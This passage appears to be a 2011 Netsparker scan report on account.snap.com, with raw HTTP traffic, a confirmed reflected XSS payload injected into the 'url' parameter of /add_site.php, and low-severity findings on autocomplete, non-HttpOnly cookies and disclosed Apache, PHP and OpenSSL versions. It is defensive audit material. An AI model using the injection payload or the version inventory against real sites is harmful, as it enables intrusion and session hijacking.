<select class="text" name="shots_category1"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports</option> <option value="Travel">Travel</option> </select> </li>

<li>If Applicable, Select a Secondary Category for Your Site:<br />
<select class="text" name="shots_category2"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports</option> <option value="Travel">Travel</option> </select> </li>

<li>Select the Gender that Best Describes Your Audience:<br />
<select class="text" name="shots_gender"> <option value=""></option> <option value="Primarily Male" selected>Primarily Male</option> <option value="Primarily Female">Primarily Female</option> <option value="No Preference">No Preference</option> </select> </li>

<li>Select the Age Range that Best Describes Your Audience:<br />
<select class="text" name="shots_age_range"> <option value=""></option> <option value="Under 13 years" selected>Under 13 years</option> <option value="13-17 years">13-17 years</option> <option value="18-24 years">18-24 years</option> <option value="25-34 years">25-34 years</option> <option value="35-44 years">35-44 years</option> <option value="45-54 years">45-54 years</option> <option value="55-64 years">55-64 years</option> <option value="65 or older">65 or older</option> </select> </li>

<li>Select the Geography that Best Describes Where Your Audience is From:<br />
<select class="text" name="shots_geography"> <option value=""></option> <option value="Africa" selected>Africa</option> <option value="Asia">Asia</option> <option value="Carribean">Carribean</option> <option value="Central America">Central America</option> <option value="Europe">Europe</option> <option value="Middle East">Middle East</option> <option value="North America">North America</option> <option value="Oceania">Oceania</option> <option value="South America">South America</option> </select> </li>
</ul>
-->
</div>

<div id="column1">

<h2>Enter Your Account Details</h2>
<ul>

<li>Your Website URL:<span class="red">*</span>&nbsp;&nbsp;<small>(e.g. www.domain.com)</small><br />
<input class="text" type="text" name="url" maxlength="255" value="'"--></style></script><script>netsparker(0x0004CC)</script>" /></li>

</ul>

<div class="clear"></div>
</div>

<div class="btn">
<img onclick="submitTabForm('setup_form');" src="/images/btn-continue.gif" width="181" height="31" />
</div>
</form>
</div>


<div id="rightSide">
<div id="web2links">
<a target="_blank" href="http://digg.com/tech_news/Snap_Shots" title="Digg this page"><img src="/images/icon-digg.gif" alt="Digg this Page" width="16" height="16"></a>
<a target="_blank" href="http://del.icio.us/post?url=http%3A%2F%2Fwww.snap.com%2Fsnapshots.php&amp;title=Snap%20Shots" title="Add to Delicious"><img src="/images/icon-delicious.gif" alt="Add to Delicious" width="16" height="16"></a>
<a target="_blank" href="mailto:?subject=Check out Snap Shots&body=Snap Shots is a great new web tool.%0A%0ACheck it out at: http://www.snap.com/snapshots.php%0A%0A(if the above link doesn't work, copy and paste the url into your browser address bar)." title="email a friend"><img src="/images/icon-emailafriend.gif" alt="email a friend" width="16" height="16"></a>
</div>

<div class="sidebar">
<h4>Testimonials</h4>
Snap Shots is an efficiency tool - it saves time for the reader, and that's a good thing for the publisher. I like it so much I put it on Techcrunch.<br /><br />
<small class="r">- Michael Arrington, <a href="http://www.techcrunch.com" target="_blank">Techcrunch</a></small>
<div class="clear"></div>
</div>
</div>
<div class="clear"></div>
</div>
<div id="bottom-cap"></div>
<div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/add_site.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
- /add_site.php

/add_site.php

https://account.snap.com/add_site.php

Parameters

Parameter Type Value
url POST '"--></style></script><script>alert(0x0004F8)</script>

Notes

This page responds with an HTTP redirect status; therefore the detected XSS vulnerability might not be exploitable in many conditions. However, it still indicates a lack of correct output filtering and should be addressed.

Request

POST /add_site.php HTTP/1.1
Referer: https://account.snap.com/add_site.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=2b809de6f57474362ce3a3b367e55d23
Content-Length: 89
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004F8)%3c%2fscript%3e

Response

HTTP/1.0 302 Found
Date: Sat, 23 Jul 2011 22:42:27 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login.php
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'setup';</script><script type="text/javascript" src="/javascript/jquery.js"></script>

<div id="top-cap"></div>
<div id="wrapper">


<div class="clear"></div>
<div id="leftSide">
<ul id="tabs"><li><span class="tab-on">Site Info</span></li><li><span class="">Customization</span></li><li><span class="">Installation</span></li><li><span class="tab-off">Snap Shares&trade;</span></li> </ul>
<div id="statusInfo">
<h3>Add Shots to a New Site</h3> <p class="alert">No user found with that email</p> </div>

<form id="setup_form" name="setup_form" action="/add_site.php" method="post">


<div id="column2">
<div id="terms">
</div>

<!--
<h2>Describe Your Site & Audience</h2>



<ul>
<li>Select the Primary Category of Your Site:<br />
<select class="text" name="shots_category1"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports</option> <option value="Travel">Travel</option> </select> </li>

<li>If Applicable, Select a Secondary Category for Your Site:<br />
<select class="text" name="shots_category2"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports</option> <option value="Travel">Travel</option> </select> </li>

<li>Select the Gender that Best Describes Your Audience:<br />
<select class="text" name="shots_gender"> <option value="" selected></option> <option value="Primarily Male">Primarily Male</option> <option value="Primarily Female">Primarily Female</option> <option value="No Preference">No Preference</option> </select> </li>

<li>Select the Age Range that Best Describes Your Audience:<br />
<select class="text" name="shots_age_range"> <option value="" selected></option> <option value="Under 13 years">Under 13 years</option> <option value="13-17 years">13-17 years</option> <option value="18-24 years">18-24 years</option> <option value="25-34 years">25-34 years</option> <option value="35-44 years">35-44 years</option> <option value="45-54 years">45-54 years</option> <option value="55-64 years">55-64 years</option> <option value="65 or older">65 or older</option> </select> </li>

<li>Select the Geography that Best Describes Where Your Audience is From:<br />
<select class="text" name="shots_geography"> <option value="" selected></option> <option value="Africa">Africa</option> <option value="Asia">Asia</option> <option value="Carribean">Carribean</option> <option value="Central America">Central America</option> <option value="Europe">Europe</option> <option value="Middle East">Middle East</option> <option value="North America">North America</option> <option value="Oceania">Oceania</option> <option value="South America">South America</option> </select> </li>
</ul>
-->
</div>

<div id="column1">

<h2>Enter Your Account Details</h2>
<ul>

<li>Your Website URL:<span class="red">*</span>&nbsp;&nbsp;<small>(e.g. www.domain.com)</small><br />
<input class="text" type="text" name="url" maxlength="255" value="'"--></style></script><script>netsparker(0x0004F8)</script>" /></li>

</ul>

<div class="clear"></div>
</div>

<div class="btn">
<img onclick="submitTabForm('setup_form');" src="/images/btn-continue.gif" width="181" height="31" />
</div>
</form>
</div>


<div id="rightSide">
<div id="web2links">
<a target="_blank" href="http://digg.com/tech_news/Snap_Shots" title="Digg this page"><img src="/images/icon-digg.gif" alt="Digg this Page" width="16" height="16"></a>
<a target="_blank" href="http://del.icio.us/post?url=http%3A%2F%2Fwww.snap.com%2Fsnapshots.php&amp;title=Snap%20Shots" title="Add to Delicious"><img src="/images/icon-delicious.gif" alt="Add to Delicious" width="16" height="16"></a>
<a target="_blank" href="mailto:?subject=Check out Snap Shots&body=Snap Shots is a great new web tool.%0A%0ACheck it out at: http://www.snap.com/snapshots.php%0A%0A(if the above link doesn't work, copy and paste the url into your browser address bar)." title="email a friend"><img src="/images/icon-emailafriend.gif" alt="email a friend" width="16" height="16"></a>
</div>

<div class="sidebar">
<h4>Testimonials</h4>
Snap Shots is an efficiency tool - it saves time for the reader, and that's a good thing for the publisher. I like it so much I put it on Techcrunch.<br /><br />
<small class="r">- Michael Arrington, <a href="http://www.techcrunch.com" target="_blank">Techcrunch</a></small>
<div class="clear"></div>
</div>
</div>
<div class="clear"></div>
</div>
<div id="bottom-cap"></div>
<div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/add_site.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /login.php

/login.php CONFIRMED

https://account.snap.com/login.php

Identified Field Name

password

Request

GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:51 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=3807e7a155fa600b1bf882a69d2f4cde; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 3483
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><div id="leftSide"><h1>Log in to your Snap Account</h1><div id="colCombine"> <form id="login" name="login" action="/login.php" method="post"> <p>If you don't have a Snap account, start by <a href="/signup.php">creating one</a>.</p> <ul id="enterInfo"> <li> <h2>Please Enter Your Email and Password</h2> </li> <li> <h5>Your Email:</h5> <input tabindex="1" type="text" id="enter" class="text" name="email" value=""> </li> <li> <h5>Your Password: <span><a tabindex="5" href="forgot_password.php">Forgot your password?</a></span></h5> <input tabindex="2" type="password" class="text" name="password" value=""> </li> <li id="remember"> <input tabindex="3" name="remember_me" value="1" type="checkbox"> Remember Me <small>(on this computer until you log out)</small> </li> <li class="btn"> <input tabindex="4" type="image" name="submit" src="/images/btn-login.gif" width="181" height="31" alt="Log In" title="Log In" /> </li> </form> <li class="dotted"> <p> <h5>Already have Snap Shots on your site but no account?</h5> <a tabindex="6" href="/importsettings.php">Click here</a> to create an account based on your current settings. </p> </li> </ul></div></div><div id="rightSide"><div class="sidebar"><h4>Recent Blog Posts</h4></div><div class="sidebar2"><h4>Special Offers</h4><a href="http://www.atomz.com/snap.html"><img src="images/atomz_ad.jpg" alt="Atomz - Free Site Search for Your Website" border="0" width="180" height="150" /></a></div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/login.php#" + currentTab);} else { urchinTracker();}</script><form id="login_form" method="POST" action="login.php"> <input type="hidden" name="tab" value="1"></form></div><script>document.getElementById("enter").focus();</script></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts; therefore, marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly (after these changes, JavaScript code will not be able to read the cookies).

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However, this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /login.php

/login.php CONFIRMED

https://account.snap.com/login.php

Identified Cookie

PHPSESSID

Request

GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:51 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=3807e7a155fa600b1bf882a69d2f4cde; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 3483
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><div id="leftSide"><h1>Log in to your Snap Account</h1><div id="colCombine"> <form id="login" name="login" action="/login.php" method="post"> <p>If you don't have a Snap account, start by <a href="/signup.php">creating one</a>.</p> <ul id="enterInfo"> <li> <h2>Please Enter Your Email and Password</h2> </li> <li> <h5>Your Email:</h5> <input tabindex="1" type="text" id="enter" class="text" name="email" value=""> </li> <li> <h5>Your Password: <span><a tabindex="5" href="forgot_password.php">Forgot your password?</a></span></h5> <input tabindex="2" type="password" class="text" name="password" value=""> </li> <li id="remember"> <input tabindex="3" name="remember_me" value="1" type="checkbox"> Remember Me <small>(on this computer until you log out)</small> </li> <li class="btn"> <input tabindex="4" type="image" name="submit" src="/images/btn-login.gif" width="181" height="31" alt="Log In" title="Log In" /> </li> </form> <li class="dotted"> <p> <h5>Already have Snap Shots on your site but no account?</h5> <a tabindex="6" href="/importsettings.php">Click here</a> to create an account based on your current settings. </p> </li> </ul></div></div><div id="rightSide"><div class="sidebar"><h4>Recent Blog Posts</h4></div><div class="sidebar2"><h4>Special Offers</h4><a href="http://www.atomz.com/snap.html"><img src="images/atomz_ad.jpg" alt="Atomz - Free Site Search for Your Website" border="0" width="180" height="150" /></a></div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/login.php#" + currentTab);} else { urchinTracker();}</script><form id="login_form" method="POST" action="login.php"> <input type="hidden" name="tab" value="1"></form></div><script>document.getElementById("enter").focus();</script></body></html>
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /javascript/

/javascript/

https://account.snap.com/javascript/

Extracted Version

2.2.14 (Unix)

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with other vulnerabilities in the application or the web server.
- /javascript/

/javascript/

https://account.snap.com/javascript/

Extracted Version

PHP/5.2.8

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks, and the system can also become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. The attacker can also use this information in conjunction with other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /javascript/

/javascript/

https://account.snap.com/javascript/

Extracted Version

OpenSSL/0.9.7d

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the version of one of its Apache modules. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /javascript/

/javascript/

https://account.snap.com/javascript/

Extracted Version

mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /javascript/

/javascript/ CONFIRMED

https://account.snap.com/javascript/

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
File Upload Functionality Identified

File Upload Functionality Identified

1 TOTAL
INFORMATION
CONFIRMED
1
This page allows users to upload files to the web server. Upload forms are generally dangerous unless they are coded with a great deal of care. This issue is reported for information only. If any other vulnerability is identified regarding this resource, Netsparker will report it as a separate issue.
- /signup.php

/signup.php CONFIRMED

https://account.snap.com/signup.php

Form Name

logo_input

Request

GET /signup.php HTTP/1.1
Referer: https://account.snap.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


